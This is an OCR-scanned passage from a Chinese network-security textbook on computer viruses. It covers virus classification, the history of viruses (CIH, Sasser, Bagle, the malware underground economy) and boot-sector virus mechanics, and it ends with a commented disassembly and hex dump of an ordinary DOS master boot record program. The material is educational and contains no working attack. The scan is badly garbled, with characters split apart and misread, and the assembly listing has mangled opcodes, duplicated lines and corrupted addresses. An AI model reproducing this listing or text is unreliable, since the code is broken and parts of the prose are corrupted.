击 方式 可 采用 占用 大 量 内 存 、 改 变 内 存 总 量 、 禁 止 分 配 内 存 和 蚕食 内 存 等 多 种 
手段 。 
e@ “干扰 系统 运行 ， 例 如 不 执行 命令 、 干 扰 命令 的 执行 、 虚 假 报警 、 打 不 开 文件 、 内 
部 栈 溢出 、 占 用 特殊 数据 区 、 换 现行 盘 、 重 启动 、 死 机 、 扰 乱 串 并 行 口 等 。 
@ ”降低 计算 机 速度 ， 病 毒 被 激活 时 ， 可 将 其 内 部 的 时 间 延 迟 程序 启动 ， 并 在 时 钟 中 
纳入 时 间 的 循环 计数 ， 迫 使 计算 机 空转 ， 造 成 计算 机 速度 明显 下 降 。 
e@ ”扰乱 键盘 输入 和 屏幕 显示 ， 例 如 ， 响 铃 、 封 锁 键盘 、 换 字 、 抹 掉 缓 存 区 字符 、 重 
复 、 输 入 紊乱 等 键盘 扰乱 方式 和 字符 跌落 、 环 绕 、 倒 置 、 显 示 前 一 屏 、 光 标 下 
跌 、 滚 屏 、 抖 动 、 乱 写 、 吃 字符 等 屏幕 显示 扰乱 方式 。 
e@ “干扰 计算 机 喇叭 和 打印 机 等 ， 许 多 病毒 运行 时 会 使 计算 机 的 喇叭 发 出 响声 ， 例 如 
演奏 曲子 、 警 笛 声 、 炸 弹 噪声 、 鸣 叫 、 味 叶 声 、 咬 哮 声 等 ， 而 有 些 病毒 会 使 打印 
机 产生 假 报警 、 间 断 性 打印 和 打印 时 更 换 字符 等 问题 。 
根据 病毒 的 破坏 对 象 、 范 围 和 程度 对 计算 机 病毒 分 类 ， 有 助 于 人 们 对 病毒 采取 适当 的 
技术 措施 来 防范 。 另 外 ， 需 要 注意 的 是 一 些 现在 的 无 害 型 病毒 也 可 能 会 对 新 版 的 Windows 
和 其 他 操作 系统 造成 破坏 。 例 如 在 早期 的 病毒 中 ， 有 一 种 “Denzuk” 病 毒 ， 它 可 以 在 
360KB 的 磁盘 上 很 好 地 工作 ， 不 会 造成 任何 破坏 ， 但 是 在 后 来 的 高 密度 软盘 上 却 能 引起 大 
量 的 数据 丢失 。 


4. 依据 病毒 的 算法 原理 来 分 类 


根据 病毒 的 开发 算法 原理 ， 可 将 计算 机 病毒 分 为 伴随 型 病毒 、 蠕 虫 型 病毒 和 寄生 型 病 
毒 等 。 

伴随 型 病毒 通常 并 不 改变 文件 本 身 ， 而 是 根据 其 算法 产生 可 执行 文件 的 伴随 体 ， 并 且 
具有 同样 的 名 字 和 不 同 的 扩展 名 ， 例 如 XCOPY.EXE 的 伴随 体 有 可 能 是 XCOPY.COM 
病毒 会 把 自身 写 入 .COM 文件 ， 而 不 是 .EXE 文件 。 当 这 些 文件 被 计算 机 加 载 时， 伴随 体 
会 被 优先 执行 ， 再 由 伴随 体 加 载 执行 原来 的 EXE 文件 。 

蠕虫 型 病毒 借助 计算 机 网 络 进行 传播 ， 通 常 不 采取 利用 PE 格式 插入 文件 的 方法 ， 而 
是 通过 复制 自身 在 网 络 环境 下 进行 传播 。 普 通病 毒 通常 是 将 自己 的 指令 代码 写 到 其 他 程序 
体内 ， 这 些 被 感染 的 文件 就 被 称 为 “宿主 ”， 例 如 Windows 下 可 执行 文件 的 格式 为 PE 格 
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式 (Portable Executable)， 当 需要 感染 PE 文件 时 ， 病 毒 程序 就 在 宿主 程序 中 建立 一 个 新 
节 ， 将 病毒 代码 写 到 新 节 中 ， 并 进行 修改 程序 入 口 点 等 工作 ， 当 宿主 程序 被 执行 时 ， 就 会 
首先 执行 病毒 程序 ， 待 病毒 程序 执行 完 后 ， 再 将 程序 的 控制 权 交还 给 宿主 程序 。 因 此 普通 
病毒 主要 是 感染 文件 、 内 存 以 及 引导 区 ， 而 蠕虫 病毒 的 传染 目标 是 互联 网 内 的 所 有 计算 
机 。 共 享 文件 、 电 子 邮 件 、 网 络 中 的 恶意 网 页 以 及 存在 着 大 量 漏洞 的 服务 器 等 都 可 以 成 为 
蠕虫 病毒 传播 的 途径 ， 互 联网 的 日 益 发 达 也 使 得 蠕虫 病毒 可 以 在 几 个 小 时 内 草 延 到 全 球 ， 
而 且 蠕虫 病毒 的 主动 攻击 性 和 突然 爆发 性 常 使 人 们 感到 措手不及 。 

除了 伴随 型 和 蠕虫 型 病毒 ， 其 他 病毒 均 可 称 为 寄生 型 病毒 ， 它 们 通过 寄生 在 文件 系统 
或 引导 扇 区 中 ， 借 助 计算 机 系统 的 功能 进行 传播 。 

另外 ， 还 有 一 些 类 型 的 病毒 其 算法 更 加 复杂 ， 例 如 变型 病毒 ， 该 类 型 病毒 一 般 是 通过 
一 段 混 有 无 关 指 令 的 解码 算法 和 被 变化 过 的 病毒 体 组 成 ， 使 得 自己 在 每 传播 一 份 病毒 体 
时 ， 都 具有 不 同 的 内 容 和 长 度 ， 已 达到 隐藏 自己 的 目的 。 


5. 依据 病毒 的 传染 对 象 来 分 类 


按照 病毒 的 传染 对 象 ， 还 可 将 计算 机 病毒 划分 为 根 扇 区 病毒 、 文 件 病毒 、 宏 病毒 和 脚 
本 病毒 等 。 

根 扇 区 病毒 首先 会 将 它 的 启动 代码 放 在 根 扇 区 中 ， 当 计算 机 尝试 读 取 或 执行 根 扇 区 中 
的 程序 时 ， 病 毒 就 会 进入 内 存 并 取得 对 计算 机 的 控制 权 。 通 过 内 存 ， 根 扇 区 病毒 能 够 传染 
到 系统 的 其 他 资源 ， 病 毒 运行 后 ， 通 常会 执行 正常 的 根 扇 区 程序 ， 而 这 些 程序 会 被 病毒 存 
储 到 磁盘 的 其 他 地 方 。 

文件 病毒 通常 用 自身 蔡 换 或 附着 在 COM 和 EXE 等 可 执行 文件 上 ， 同 时 也 会 感染 具 
有 SYS、BIN、DLL、DRV、OVL 和 OVY 等 扩展 名 的 文件 ， 文 件 病毒 既 可 以 是 驻 留 型 的 
也 可 以 是 非 驻 留 型 的 。 常 见 的 文件 病毒 通常 都 是 驻 留 或 TSR 型 病毒 ， 而 许多 非 驻 留 文件 
病毒 在 它们 执行 时 仅 是 简单 地 传染 一 个 或 多 个 文件 。 

宏 病 毒 是 一 个 恶意 的 宏 ， 宏 是 一 组 指令 的 序列 ， 它 通常 用 于 简化 一 些 文档 中 的 重复 任 
务 ， 当 用 户 打开 一 个 带 有 宏 的 文件 时 ， 宏 就 开始 执行 了 。 而 宏 病 毒 正 是 利用 某 种 宏 语言 
制 ， 并 附着 在 一 个 文档 文件 上 ， 当 一 个 包含 了 宏 病 毒 的 文档 或 模板 在 一 个 应 用 中 被 打开 
时 ， 宏 病毒 就 开始 运行 ， 制 造 破 坏 ， 同 时 将 自身 复制 到 其 他 健康 的 文档 中 ， 从 而 导致 病毒 
的 扩散 。 

脚本 病毒 利用 操作 系统 提供 的 脚本 语言 来 进行 传染 ， 此 类 病毒 包括 DOS 批文 件 病 
毒 、VB 脚本 语言 病毒 和 Unix shell 脚本 病毒 等 。 

随 着 混合 型 病毒 技术 的 发 展 ， 病 毒 的 传染 对 象 也 呈现 出 多 种 技术 的 组 合 ， 这 些 技术 可 
同时 传染 包括 文档 、 可 执行 文件 和 根 扇 区 等 多 种 对 象 ， 被 称 为 Multipartite 型 病毒 。 大 多 
数 Multipartite 型 病毒 首先 会 驻 留 在 内 存 中 ， 然 后 传染 硬盘 的 根 扇 区 ， 一 旦 进入 内 存 后 ， 
该 型 病毒 就 可 以 传染 整个 系统 了 ， 因 此 清除 一 个 Multipartite 型 病毒 需要 清除 根 扇 区 和 所 
有 被 传染 的 文件 系统 。 


8.1.4 计算 机 病毒 的 发 展 概述 
计算 机 病毒 的 发 展 是 随 着 计算 机 技术 、 通 信 技 术 和 反 病毒 技术 的 发 展 而 来 的 ， 而 计算 
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机 病毒 通常 都 会 在 出 现 一 种 新 的 病毒 技术 后 得 到 迅速 发 展 ， 本 节 我 们 将 回顾 一 下 计算 机 病 
毒 大 致 的 发 展 历史 。 


1. 计算 机 病毒 前 史 : 大 计算 机 和 小 恶作剧 


早 在 电子 计算 机 发 明 以 前 ， 被 誉 为 “计算 机 之 父 ” 的 汉 “。 诺 依 曼 就 在 一 篇 名 为 《复杂 
自动 装置 理论 及 组 织 的 进行 》 的 论文 中 提出 了 可 自我 复制 程序 的 概念 ， 但 当时 的 计算 机 都 
是 一 些 巨 大 、 昂 贵 而 笨重 的 设备 ， 只 有 一 些 大 公司 、 大 学 和 研究 机 构 才 能 拥有 ， 并 且 由 于 
其 计算 速度 慢 而 指令 又 相对 复杂 ， 因 此 只 有 极 少 数 人 才能 掌握 。 直 到 20 世纪 60 年 代 初 ， 
在 美国 的 贝尔 实验 室 ， 才 有 三 个 年 轻 人 设计 和 开发 除了 一 种 后 来 被 称 为 “ 磁 芯 大 战 ” 
(Core War) 的 游戏 ， 在 这 个 游戏 中 ， 开 发 者 应 用 了 冯 。 诺 依 曼 提 到 的 “程序 自我 复制 理 
论 ”。 

磁 芯 大 战 运行 在 当时 被 称 为 Mars 的 一 种 简单 计算 机 上 ， 它 仅 有 固定 的 8000 个 内 存单 
元 和 约 十 来 个 指令 ， 整 个 大 战 程序 就 是 由 这 些 指令 来 完成 的 。 这 款 游 戏 至 今 在 国外 还 很 流 
行 ， 每 年 除了 会 举办 各 种 大 小 赛事 之 外 ， 还 会 组 织 周年 纪念 聚会 。 

1983 年 ， 弗 雷 德 。 科 恩 (Fred Cohen) 在 南 加 州 大 学 攻读 博士 学 位 时 ， 写 出 了 一 个 具有 
可 自我 复制 及 感染 能 力 的 程序 ， 这 个 程序 能 够 在 一 个 小 时 内 传 遍 整个 电脑 系统 ， 后 来 他 在 
一 个 电脑 安全 研讨 会 上 公布 了 自己 的 研究 成 果 。 几 乎 在 同时 ，1982 年 初 ， 黎 巴 嫩 山 高 中 
九 年 级 学 生理 查 德 。 斯 科 伦 塔 在 苹果 二 型 计算 机 上 写 出 了 一 个 名 叫 “Elk Cloner” 的 程 
序 ， 并 把 它 拷贝 到 游戏 软盘 中 。 当 写 入 了 该 程序 的 软盘 运行 时 ， 就 会 自我 复制 一 份 在 计算 
机 的 内 存 中 ， 一 旦 有 人 将 一 张 干净 的 软盘 插入 计算 机 并 查看 文件 时 ，“Elk Cloner” 就 会 
自我 复制 进 这 张 软盘 ， 当 第 50 次 启动 被 感染 的 软盘 时 ， 就 会 出 现 斯 科 伦 塔 自 编 的 一 首 打 
油 诗 。 

2. 早期 计算 机 病毒 


早期 病毒 出 现在 20 世纪 80 年 代 ， 由 于 当时 应 用 软件 比较 少 ， 而 且 大 多 是 单机 运行 的 
环境 ， 因 此 病毒 没有 大 量 流行 起 来 ， 病 毒 种 类 也 比较 有 限 。 

该 阶段 病毒 主要 以 引导 型 病毒 和 可 执行 文件 型 病毒 为 主 ， 以 小 球 病毒 、 石 头 病毒 和 耶 
路 撒 冷 病毒 为 代表 。 以 小 球 病毒 为 例 ， 该 病毒 的 发 作 条 件 是 当 系统 时 钟 处 于 半点 或 整 点 ， 
而 系统 又 在 进行 读 盘 操作 时 会 激活 小 球 病毒 。 病 毒 发 作 时 屏幕 出 现 一 个 活 蹦 乱 跳 的 小 圆 
点 ， 作 和 斜 线 运动 ， 当 碰 到 屏幕 边沿 或 者 文字 就 立刻 反弹 ， 碰 到 的 文字 ， 英 文 会 被 整个 削 
去 ， 中 文 会 前 去 半 个 或 整个 前 去 ， 也 可 能 留 下 制 表 符 乱码 

这 一 阶段 的 病毒 总 体 上 具有 以 下 几 个 显著 特点 : 

e ”病毒 攻击 的 目标 单一 ， 只 传染 引导 扇 区 或 可 执行 文件 。 

e ”病毒 程序 主要 采取 截取 系统 中 断 向 量 的 方式 监控 系统 的 运行 状态 ， 并 在 一 定 的 触 

发 条 件 下 进行 传播 。 
e ”病毒 传染 目标 以 后 特征 比较 明显 ， 容 易 被 人 发 现 。 
e ”大 部 分 病毒 还 不 具有 自我 保护 措施 ， 容 易 让 你 分 析 其 原理 。 


3. Windows 和 互联 网 时 代 的 病毒 和 蠕虫 
这 一 时 期 ， 最 出 名 的 Windows 病毒 应 该 算是 在 1998 年 由 台湾 人 陈 盈 豪 编写 的 
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“CIH” 病 毒 了 。 这 个 病毒 一 共有 从 V1.0 到 V1.4 五 个 版 本 ， 其 中 造成 最 大 损失 的 是 V1.2 
版 ， 图 8-2 所 示 的 是 一 个 CIH V1.2 的 病毒 样本 截图 。CIH 病毒 会 在 每 年 4 月 26 日 发 作 ， 
它 不 仅 能 改写 磁盘 引导 区 数据 ， 并 且 可 能 会 修改 主板 上 的 基本 输入 输出 系统 (Basic 
Input/Output System) 芯 片 ， 甚 至 造成 主板 损坏 。1999 年 4 月 26 日 ，CIH V1.2 首次 大 范围 
爆发 ， 在 全 球 有 超过 六 千 万 台电 脑 被 不 同 程度 破坏 ， 在 2000 年 4 月 26 日 ， 又 一 次 大 范围 
爆发 ， 估 计 在 全 球 造 成 的 损失 超过 十 亿美 元 。 这 个 病毒 也 被 叫做 “ 切 尔 诺 贝 利 ” 
(Chernoby]) 病 毒 ， 因 为 4 月 26 日 是 切 尔 诺 贝 利 核电 站 发 生 核 泄漏 的 日 子 。 但 是 后 来 据 陈 
僵 豪 自己 供 称 ， 这 个 病毒 和 切 尔 诺 贝 利 核电 站 一 点 关系 都 没有 ，26 号 只 不 过 是 他 高 中 的 
学 号 而 已 。 台 湾 警 方 很 快 还 捕 了 陈 盈 豪 ， 随 后 发 现 ， 破 坏 力 更 大 的 CIH V2.0 已 经 接近 开 
发 完成 了 。 


henhe2e 
TTIT 


图 8-2 ”跟踪 CIH V1.2 病毒 样本 的 截图 


这 一 时 期 ， 还 有 一 些 比较 著名 的 病毒 ， 如 宏 病 毒 、 红 色 代码 、 蠕 虫 等 。“ 震 荡 波 ”是 
一 个 典型 的 蠕虫 病毒 ， 由 德国 一 名 17 岁 的 高 中 生 编写 的 ， 他 在 18 岁 生日 那天 释放 了 它 。 
“震荡 波 ” 从 2004 年 8 月 30 日 起 开始 传播 ， 其 破坏 能 力 之 大 令 法 国 一 些 新 闻 机 构 不 得 不 
关闭 了 卫星 通讯 ， 它 还 导致 德尔 塔 航空 公司 (Delta) 取 消 了 数 个 航班 ， 全 球 范围 内 的 许多 公 
司 不 得 不 关闭 了 网 络 。 它 利用 了 未 升级 的 Windows 2000/XP 系统 的 一 个 安全 漏洞 ， 一 旦 传 
染 到 计算 机 上 ， 它 便 主 动 扫描 其 他 未 受 保护 的 系统 并 将 自身 传播 过 去 。 后 来 德国 警方 逮捕 
了 这 个 孩子 ， 但 是 由 于 编写 这 些 代码 的 时 候 他 还 是 个 未 成 年 人 ， 虽 然 被 法 庭 认 定 从 事 计算 
机 破坏 活动 ， 但 还 是 仅 判 了 缓刑 。 

这 一 阶段 的 病毒 总 体 上 具有 以 下 几 个 显著 特点 : 

e ”病毒 攻击 的 目标 趋 于 混合 型 。 

e ”病毒 程序 不 再 采用 明显 的 截获 中 断 向 量 的 方法 来 监视 系统 ， 而 采用 更 为 隐蔽 的 方 


法 驻 留 内 存 。 

e ”病毒 感染 目标 后 ， 没 有 明显 的 特征 ， 并 且 开始 出 现 变种 ， 隐 项 性 更 强 ， 破 坏 性 
更 大 。 

e ”病毒 开始 采用 自我 保护 措施 ， 如 加 密 技 术 、 反 跟踪 技术 、 制 造 障碍 等 ， 增 加 了 对 
病毒 分 析 的 难度 。 


e ”病毒 开始 向 网 络 化 方向 发 展 ， 主 要 是 利用 网 络 来 进行 传播 和 破坏 ， 同 时 为 更 多 的 
病毒 爱好 者 提供 了 更 大 的 学 习 空 间 和 和 舞台。 


264 网 络 安全 与 管理 


4. 商业 利益 驱动 下 的 病毒 产业 链 


如 果 说 早期 病毒 的 制造 者 似乎 还 没有 和 经 济 利益 有 任何 关系 ， 他 们 或 者 出 于 对 技术 的 
热爱 ， 或 者 出 于 对 自由 共享 的 互联 网 精神 的 崇拜 ， 又 或 者 只 是 往往 为 了 宣扬 自己 的 名 声 或 
者 对 现实 生活 不 满 而 开发 出 各 种 病毒 ， 但 是 接 下 来 ， 情 况 却 奇怪 地 扭曲 了 。 

2004 年 1 月 18 日 ，“Bagle” 蠕 虫 被 发 现 了 ， 它 的 传染 方式 类 似 “ 爱 虫 ”， 同 样 是 利 
用 电子 邮件 中 的 附件 来 感染 用 户 的 计算 机 ， 但 不 同 之 处 在 于 : 它 会 收集 用 户 的 电子 邮件 地 
址 ， 并 且 把 这 些 邮件 地 址 发 送 到 一 个 指定 位 置 。 据 反 病 毒 专家 推测 ， 也 许 这 个 蠕虫 的 作者 
打算 把 收集 到 的 邮件 地 址 卖 给 那些 通过 电子 邮件 来 推销 的 商家 。 几 天 后 ， 这 个 蠕虫 的 作者 
就 放出 了 源 代码 ， 让 任何 具有 一 定编 程 能 力 的 人 都 可 以 制造 出 自己 的 蠕虫 变种 。 
“Bagle” 蠕 虫 被 设 定 为 到 了 1 月 28 日 就 停止 传播 ， 但 是 在 那 之 后 ， 依 然 有 许多 变种 肆虐 
在 互联 网 上 。 这 可 以 算是 一 个 计算 机 病毒 发 展 史上 的 转折 点 。 因 为 在 此 之 前 ， 病 毒 和 蠕虫 
的 作者 似乎 并 没有 什么 经 济 利益 而 言 ， 因 为 通过 技术 危害 他 人 计算 机 安全 及 隐私 而 获 利 的 
行为 和 “黑客 精神 ”背道而驰 。 但 是 “Bagle” 蠕 虫 的 出 现 ， 标 志 着 “通过 恶意 软件 获 利 
运动 ”的 开始 。 从 这 时 起 ， 一 条 黑色 的 地 下 产业 链 开始 慢 慢 建立 起 来 。 这 些 病毒 中 绝 大 部 
分 都 携带 了 木马 病毒 和 后 门 病毒 ， 占 据 了 病毒 总 数 的 84% 以 上 。 在 2007 年 全 国 流行 的 十 
大 病毒 中 ， 盗 取 用 户 账 号 和 密码 的 病毒 就 占据 了 4 种 ，“ 网 游 盗 号 木马 ”、“QQ 通行 
证 ”、“ 魔 兽 世 界 木 马 ”、“ 传 奇 终结 者 ”这 几 种 病毒 分 别名 列 这 个 榜 单 的 第 一 、 第 二 、 
第 四 和 第 九 位 。 

在 这 些 病毒 泛滥 的 背后 ， 逐 渐 形成 了 一 条 明晰 的 病毒 产业 链 。 比 较 常见 的 硬 利 方式 包 
括 把 从 被 感染 的 计算 机 上 获取 账号 和 密码 并 二 次 出 售 或 直接 套现 ， 除 此 之 外 ， 还 包括 把 被 
控制 的 计算 机 (俗称 “肉鸡 ”) 的 控制 权 出 售 给 不 法 商人 的 盔 利 途径 ， 购 买 者 可 以 使 用 这 些 
计算 机 发 起 分 布 式 拒绝 服务 (Distributed Denial of Service，DDoS) 攻 击 ， 从 而 使 被 攻击 的 网 
站 或 者 服务 器 陷入 瘫痪 。 随 着 病毒 产业 链 的 完善 ， 对 病毒 的 需求 也 和 以 前 不 同 了 。 现 在 的 
病毒 更 像 是 我 们 日 常 使 用 的 软件 ， 会 在 连接 到 互联 网 时 自动 升级 ， 并 实时 更 新 。 


8.2 ”计算 机 病毒 惯用 技术 


从 传统 计算 机 病毒 开始 ， 病 毒 开发 者 就 采用 了 加 密 、 压 缩 、 自 我 编码 、 变 体 引擎 、 更 
名 感染 等 技术 ， 以 此 逃避 防毒 软件 的 侦 测 及 追捕 。 除 此 之 外 ， 一 些 恶 性 病毒 或 程序 还 具备 
了 自我 检查 及 反 防 毒 软件 的 能 力 。 由 于 目前 病毒 的 种 类 和 实现 技术 非常 繁多 ， 本 节 仅 着 重 
介绍 计算 机 病毒 常用 的 一 些 技术 。 


8.2.1 引导 型 病毒 的 技术 特点 


计算 机 病毒 能 感染 的 只 有 可 执行 代码 ， 通 常 都 是 计算 机 中 的 引导 程序 和 可 执行 文件 ， 
另外 还 有 一 类 特殊 的 病毒 ， 例 如 宏 病 毒 (因为 宏 也 是 可 执行 代码 )。 而 由 于 目前 计算 机 的 
FlashROM 的 BIOS 都 是 可 以 写 保护 的 ， 因 此 对 它 进行 感染 的 意义 已 经 不 大 了 。 引 导 型 病 
毒 虽然 具有 隐蔽 性 强 、 兼 容 性 强 的 优点 ， 但 是 缺点 也 很 多 ， 例 如 传染 速度 慢 、 杀 毒 容易 
等 ， 目 前 纯 引 导 型 病毒 已 经 很 少 了 ， 更 多 的 是 具有 引导 型 特点 的 混合 型 病毒 。 引 导 型 计算 
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机 病毒 是 指 既 传染 硬盘 主 引导 区 ， 又 传染 DOS 的 BOOT 区 的 计算 机 病毒 ， 它 一 般 传染 硬 
盘 的 BOOT 区 、 软 盘 的 BOOT 区 以 及 硬盘 分 区 表 。 引 导 型 病毒 利用 了 系统 引导 时 不 对 主 
引导 区 内 容 进行 正确 性 判别 的 漏洞 。 按 照 引 导 型 病毒 在 硬盘 上 的 寄生 位 置 又 可 细 分 为 主 引 
导 记 录 病 毒 和 分 区 引导 记录 病毒 。 主 引导 记录 病毒 感染 硬盘 的 主 引导 区 ， 如 大 麻 病毒 、 
2708 病毒 、 火 炬 病毒 等 ， 分 区 引导 记录 病毒 感染 硬盘 的 活动 分 区 引导 记录 ， 如 小 球 病 
毒 、Girl 病毒 等 。 

由 于 目前 软盘 已 经 很 少 使 用 ， 因 此 本 节 内 容 主要 针对 硬盘 的 引导 型 病毒 进行 介绍 。 


1. 硬盘 的 主 引导 扇 区 


以 DOS 为 例 ， 由 于 硬盘 存储 空间 比较 大 ， 为 了 允许 多 个 操作 系统 分 享 硬盘 空间 ， 并 
从 硬盘 中 启动 系统 ，DOS 在 格式 化 硬盘 时 ， 将 硬盘 主 引导 扇 区 划分 为 主 引导 记录 区 和 4 
个 系统 分 区 ， 如 图 8-3 所 示 。 


主 引 导 记 录 区 系统 分 区 -1 系统 分 区 -2 系统 分 区 -3 系统 分 区 -4 


8-3 ”硬盘 空间 的 总 体 划分 示意 图 


主 引导 区 占据 了 整个 硬盘 的 第 一 扇 区 ， 它 通常 由 两 部 分 内 容 组 成 : 一 部 分 是 主 引导 程 
序 ; 第 二 部 分 是 分 区 信息 表 。 其 中 ， 主 引导 程序 是 硬盘 启动 时 首先 需要 得 到 执行 的 程序 ， 
并 由 它 载 入 执行 分 区 引导 程序 ， 从 而 进一步 引导 系统 。 而 分 区 信息 表 登 记 了 各 个 分 区 的 引 
导 指 示 符 、 操 作 系 统 指示 符 以 及 该 分 区 占用 硬盘 空间 的 位 置 及 其 长 度 的 一 张 表 。 系 统 分 区 
则 是 提供 给 不 同 操作 系统 使 用 的 区 域 ， 每 个 区 域 只 能 存放 一 种 操作 系统 ， 在 该 区 域 中 的 系 
统 具 有 自己 的 引导 记录 、 文 件 分 配 表 区 、 文 件 目 录 区 以 及 数据 区 。 

硬盘 主 引导 扇 区 位 于 硬盘 的 0 柱 0 道 1 扇 区 ， 它 的 作用 是 负责 引导 执行 “分 区 引导 记 
录 ”， 从 而 进一步 引导 操作 系统 。 主 引导 区 包括 硬盘 主 引导 记录 MBR、4 个 分 区 表 DPT 
信息 和 主 引 导 记 录 有 效 标志 字 三 部 分 ， 如 表 8-1 所 示 。 其 中 主 引导 记录 MBR 从 0000H 开 
始 到 00D9H 结束 ， 共 218 个 字 节 。MBR 主要 作用 就 是 检查 分 区 表 是 否 正确 以 及 确定 哪个 
分 区 为 引导 分 区 ， 并 把 该 分 区 的 启动 程序 ( 即 操作 系统 引导 扇 区 ) 调 入 内 存 执行 。MBR 一 般 
是 由 分 区 程序 产生 的 ， 并 且 在 不 同 的 操作 系统 平台 下 ， 这 个 扇 区 的 内 容 可 能 并 不 完全 相 
同 。 由 于 主 引导 记录 是 比较 容易 编写 的 ， 因 此 给 很 多 引导 型 病毒 提供 了 机 会 。 


表 8-1 主 引 导 扇 区 结构 


区 域 言 息 
0000H ~ 008AH 主 引导 记录 启动 程序 
008BH ~ 00D9H 主 引导 记录 启动 字符 串 
00DAH ~ 01BDH 空闲 区 
01BEH ~ 01CDH 分 区 1 结构 信息 
01CEH ~ 01DDH 分 区 2 结构 信息 


01DEH ~ 01EDH 分 区 3 结构 信息 
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续 表 


分 区 4 结构 信息 
主 引 导 记录 有 效 标志 
主 引 导 程 序 位 于 主 引导 记录 MBR 中 ， 在 主 引导 扇 区 的 偏 移 地 址 0000 一 008AH 之 


间 ， 当 计算 机 开机 启动 时 ，ROM BIOS 程序 会 把 该 引导 程序 加 载 到 内 存 0000:7C00H， 开 
始 执行 主 引导 程序 。 然 后 将 自身 移 到 内 存 地 址 0000:0600H 处 ， 接 着 检查 可 引导 分 区 并 进 


O01lEEH ~ 01FDH 


OlFEH ~ O01FFH 


行 引导 。 
下 面 是 一 个 硬盘 主 引 导 程序 的 清单 : 

偏 移 地 址 ”符号 指令 说 明 

0000 CEI ;屏蔽 中 断 

0001 XOR AX, AX 

0003 MOV SS,AX ; (SS)=0000H 

0005 MOV SP, 7C00 7 (SP) =7C00H 

0008 MOV SI, SP 7 (SI) =7C00H 

000R PUSH RX 

000B POP ES ; (ES)=0000H 

000c PUSH AX 

000D POP Ds ; (DS)=0000H 

O00E STI 

000F CLD 

0010 MOV DI,0600 

0013 MOV CX, 0100 ; 共 512 字 节 

0016 REPNZ 

0017 MOVSW ; 主 引导 程序 把 自己 从 0000:7c00 处 迁移 到 
;0000:0600 处 ,为 DOS 分 区 的 引导 程序 留 
;出 空间 

0018 JMP 0000:061D ; 跳 到 0000 :061D 处 继续 执行 ,实际 上 就 是 
;执行 下 面 的 MOV 指令 (001D 偏 移 处 ) 

001D MOV SI, 07BE ;07BE-0600=01BE, 01BE 是 分 区 表 的 首 址 

0020 MOV BL,04 ;分 区 表 最 多 4 项 , 即 最 多 4 个 分 区 

0022 CMP BYTE PTR [SI],80 ;80H 表示 活动 分 区 

0025 本 35 7 找到 活动 分 区 则 跳 走 

0027 CMP BYTE PTR [SI],00 ;00H 为 有 效 分 区 的 标志 

002R JNZ 48 ; 既 非 80H 亦 非 00H 则 分 区 表 无 效 

002C ADD SI,+10 ;下 一 个 分 区 表 项 ,每 项 16 字 节 

002F DEC BL ;循环 计数 减 1 

0031 JNZ 22 ;检查 下 一 个 分 区 表 项 

0033 INT 18 7 4 个 都 不 能 引导 则 进入 ROM Basic 

0035 MOV DX, [SI] 

0037 MOV CX, [SI+02] 7 取 活 动 分 区 的 引导 扇 区 的 面 、 柱 面 、 肩 区 

003A MOV BP, SI ;然后 继续 检查 后 面 的 分 区 表 项 

003C ADD SI,+10 

003F DEC BL 

0041 2 005D 74 个 都 查 完 则 去 引导 活动 分 区 

0043 CMP BYTE PTR [SI],00 ;00H 为 分 区 有 效 标志 

0046 JZ 003c ;此 分 区 表 项 有 效 则 继续 查 下 一 个 

0048 MOV SI,068B ;068B-0600=018B, 取 "无 效 分 区 "字符 串 


004B LODSB ;从 字符 串 中 取 一 字符 
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004C CMP AL,00 ;00H 表示 串 尾 
004E 4 005B ; 串 显示 完了 则 进入 死 循环 
0050 PUSH ST 
0051 MOV BX, 0007 
0054 MOV AH, OE 
0056 INT 10 ;显示 一 个 字符 
0058 POP SI 
0059 JMP 004B ;循环 显示 下 一 个 字符 
005B JMP 005B ;此 处 为 死 循环 
005D MOV DI,0005 7 读 入 活动 分 区 的 引导 扇 区 , 最 多 试 读 5 次 
0060 MOV BX, 7C00 
0063 MOV AX, 0201 
0066 PUSH DI 
0067 INT 13 7 读 中 断 
0069 POP DI 
006R JNB 78 7 读 盘 成 功 则 跳 走 
006C XOR AX, AX 
006E INT 13 ; 读 失败 则 复位 磁盘 
0070 DEC DI 
0071 JNZ 60 ;不 到 5 次 则 再 试 读 
0073 MOV SI,06A3 706A3-0600=00A3, 即 "Error loading" 串 
0076 JMP 004B ?去 显示 字符 串 , 然后 进入 死 循环 
0078 MOV SIT, 06C2 ;06C2-0600=00cC2, 即 "Missing.." 串 
0076 JMP 004B ?去 显示 字符 串 , 然后 进入 死 循环 
0078 MOV SIT, 06C2 ;06C2-0600=00c2, 即 "Missing. ." 串 
007B MOV DI, 7DFE ;7DFE-7C00=01FE, 即 活动 分 区 的 引导 扇 区 的 
;最 后 两 字 节 的 首 址 
007E CMP WORD PTR [DI],AA55 ;最 后 两 字 节 为 AA55H 则 有 效 
0082 JNZ 004B ;无效 则 显示 字符 串 并 进入 死 循环 
0084 MOV SI,BP 
0086 JMP 0000:7c00 ;有 效 则 跳 去 引导 该 分 区 
0080 49 6E 76 61 6C Inval 
0090 69 64 20 70 61 72 74 69-74 69 6F 6E 20 74 61 62 id partition tab 
00A0 6C 65 00 45 72 72 6F 72-20 6C 6F 61 64 69 6E 67 le.Error loading 
00B0 20 6F 70 65 72 61 74 69-6E 67 20 73 79 73 74 65 operating syste 
00c0 6D 00 4D 69 73 73 69 6E-67 20 6F 70 65 72 61 74 m.Missing operat 
00D0 69 6E 67 20 73 79 73 74-65 6D 00 00 FB 4C 38 1D ing system...L8. 
00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0100 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0110 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0120 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0130 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0140 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0150 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0160 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0170 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0180 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
0190 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
01A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 
01B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 80 01 
;分 区 表 
0lc0 01 00 06 OF 7F 9C 3F 00-00 00 F1 59 06 00 00 00 
